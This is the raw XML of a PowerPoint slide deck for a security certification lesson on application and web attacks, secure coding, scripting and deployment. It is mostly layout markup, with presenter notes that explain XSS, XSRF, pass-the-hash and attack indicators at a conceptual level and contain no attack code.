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10" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId38"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId39"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="946" r:id="rId6"/>
    <p:sldId id="945" r:id="rId7"/>
    <p:sldId id="974" r:id="rId8"/>
    <p:sldId id="799" r:id="rId9"/>
    <p:sldId id="975" r:id="rId10"/>
    <p:sldId id="960" r:id="rId11"/>
    <p:sldId id="987" r:id="rId12"/>
    <p:sldId id="886" r:id="rId13"/>
    <p:sldId id="988" r:id="rId14"/>
    <p:sldId id="962" r:id="rId15"/>
    <p:sldId id="964" r:id="rId16"/>
    <p:sldId id="986" r:id="rId17"/>
    <p:sldId id="801" r:id="rId18"/>
    <p:sldId id="800" r:id="rId19"/>
    <p:sldId id="979" r:id="rId20"/>
    <p:sldId id="953" r:id="rId21"/>
    <p:sldId id="950" r:id="rId22"/>
    <p:sldId id="981" r:id="rId23"/>
    <p:sldId id="955" r:id="rId24"/>
    <p:sldId id="982" r:id="rId25"/>
    <p:sldId id="957" r:id="rId26"/>
    <p:sldId id="916" r:id="rId27"/>
    <p:sldId id="983" r:id="rId28"/>
    <p:sldId id="959" r:id="rId29"/>
    <p:sldId id="958" r:id="rId30"/>
    <p:sldId id="965" r:id="rId31"/>
    <p:sldId id="947" r:id="rId32"/>
    <p:sldId id="985" r:id="rId33"/>
    <p:sldId id="814" r:id="rId34"/>
    <p:sldId id="808" r:id="rId35"/>
    <p:sldId id="948" r:id="rId36"/>
    <p:sldId id="952" r:id="rId37"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
      <p:italic r:id="rId42"/>
      <p:boldItalic r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId44"/>
      <p:bold r:id="rId45"/>
      <p:italic r:id="rId46"/>
      <p:boldItalic r:id="rId47"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono" panose="00000009000000000000" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId48"/>
      <p:bold r:id="rId49"/>
      <p:italic r:id="rId50"/>
      <p:boldItalic r:id="rId5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 Taylor" initials="PT" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Pam Taylor" providerId="None"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="Gail Sandler" initials="GS" lastIdx="4" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="2b7e9c3f3530ff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6D00"/>
    <a:srgbClr val="44545F"/>
    <a:srgbClr val="B1B7BC"/>
    <a:srgbClr val="0A7DA0"/>
    <a:srgbClr val="007C9E"/>
    <a:srgbClr val="004D72"/>
    <a:srgbClr val="004D71"/>
    <a:srgbClr val="45545F"/>
    <a:srgbClr val="1B3764"/>
    <a:srgbClr val="0090B9"/>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8029" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="122" d="100"/>
          <a:sy n="122" d="100"/>
        </p:scale>
        <p:origin x="248" y="76"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="162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Lst>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font" Target="fonts/font2.fntdata"/><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0.fntdata"/></Relationships>
</file>

<file path=ppt/_rels/viewProps.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide33.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide32.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId22"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pPr/>
              <a:t>10/4/2023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pPr/>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pPr/>
              <a:t>10/4/2023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pPr/>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lJQn06QLwEw"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media.blackhat.com/bh-us-12/Briefings/Duckwall/BH_US_12_Duckwall_Campbell_Still_Passing_WP.pdf"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lesson covers both application attacks and secure coding practices. The importance of coding examples grows with each syllabus release, and there are a lot of fairly complex concepts to get through, so be prepared to allocate plenty of time to covering this content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Topics:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Analyze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> indicators of application attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Analyze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> indicators of web application attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Summarize secure coding practices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Implement secure script environments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Summarize deployment and automation concepts.</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pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2076715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a client-side attack is where the browser runs the malicious code. This might trigger some action on the server, but it is client-side because the browser is coding the request.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1976235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Make sure students can identify code that performs XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>Also check that students understand the difference between XSRF and XSS. XSRF spoofs a specific request against the web application; XSS is a means of running any arbitrary code. An XSS attack could be used to perform XSRF, for instance.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131645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sure students can identify SQL code and suspicious query strings.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1406656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3722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Having covered the main attack types, this topic looks at coding techniques that mitigate those risks.</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pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3236701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7540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0908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topic focuses on the uses and abuses of Python and PowerShell. We also cover the application security/code signing/execution control examples from objective 3.2.</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pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="563257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Aim to provide a broad overview of scripting technologies and practices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We will return to orchestration in a bit more detail in the next lesson.</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pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258148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the time allowed, just try to ensure that students can identify Python code and interpret basic code structures, such as function definitions, function calls, and logical tests.</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pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="671148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in most cases, a successful attack can only be identified through the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> of the compromised process of host, in terms of file system and network activity.</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pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4024653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0133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indicators are mostly gathered from the way a malicious process interacts with the system. This evidence is gathered through logging. The purpose of EDR-type products is to provide real-time automated analysis of code execution.</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pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1799944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Students need to look out for macros or document scripts that download binary data or try to execute scripts in other languages.</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pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39167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1575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conclude the development lesson with a look at the remaining content examples from objective 2.3, which cluster around the general concepts of deployment and automation.</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pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3112713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syllabus revision has removed waterfall and Agile as explicit content examples. We need to mention them to explain "continuous," but students should not need to know the development life cycle phases in anything other than very general terms.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3219656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8725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Make sure students can distinguish these phases.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1550884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protect against software exploitation, apply security patches (for third-party applications) or secure programming practice (for your own applications).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>OWASP is a great resource for more detailed information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> shows, an exploit might use several attack techniques to compromise vulnerable code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="757011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Stress to students that like any EXE file, DLLs and drivers should only be run or installed if they are signed with a valid certificate from a reputable vendor.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3323011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45545F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You might also want to mention golden ticket attacks (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007C9E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>youtube.com/watch?v=lJQn06QLwEw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="45545F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If students are interested in learning more about pass the hash and ticket forging, refer them to the briefing here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007C9E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>media.blackhat.com/bh-us-12/Briefings/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007C9E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Duckwall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007C9E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/BH_US_12_Duckwall_Campbell_Still_Passing_WP.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="45545F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>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pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="895916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topic deals with the remainder of the application attack content examples, which mostly refer to web application server and client vulnerabilities and exploits.</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pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1594312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sure students can interpret the parts of a URL and are familiar with the general process of HTTP requests and responses and methods.</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pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3720103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replay depends on weak session management tokens.</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pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1186258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a client-side attack is where the browser runs the malicious code. This might trigger some action on the server, but it is client-side because the browser is coding the request.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6210630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Lesson">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89D54FF8-0097-4E4C-A337-D0D5F09F5D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="408561" y="331611"/>
            <a:ext cx="8326878" cy="3443110"/>
          </a:xfrm>
          <a:prstGeom prst="round1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx2"/>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4084809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ands-On Activityo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6802679"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p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7215509" y="3683725"/>
            <a:ext cx="1605176"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2" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2E83E6-9A59-464C-8762-83227755E34E}"/>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id="{AF22B7D2-CF03-448D-9562-1B5072D25D01}"/>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3115742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ands-On Activity">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15C7DD6-3E03-4C74-AA30-9E1DF61252FB}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A9BFAA4-B692-4B26-BF12-35D369620B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7001303" y="3391133"/>
            <a:ext cx="1857606" cy="1445424"/>
            <a:chOff x="6939887" y="3391133"/>
            <a:chExt cx="1857606" cy="1445424"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1F8C84A-B36C-4ECA-A942-6D94950145A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6984242" y="3391133"/>
              <a:ext cx="1768897" cy="1100033"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B880B59-FC96-477E-AC99-8876E161C9DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6939887" y="4467225"/>
              <a:ext cx="1857606" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Lab Activity</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D55877A-36DD-4C5F-9261-0D426EBA0161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1514902"/>
            <a:ext cx="6659379" cy="3167002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:defRPr/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle: Single Corner Rounded 9">
            <a:extLst>
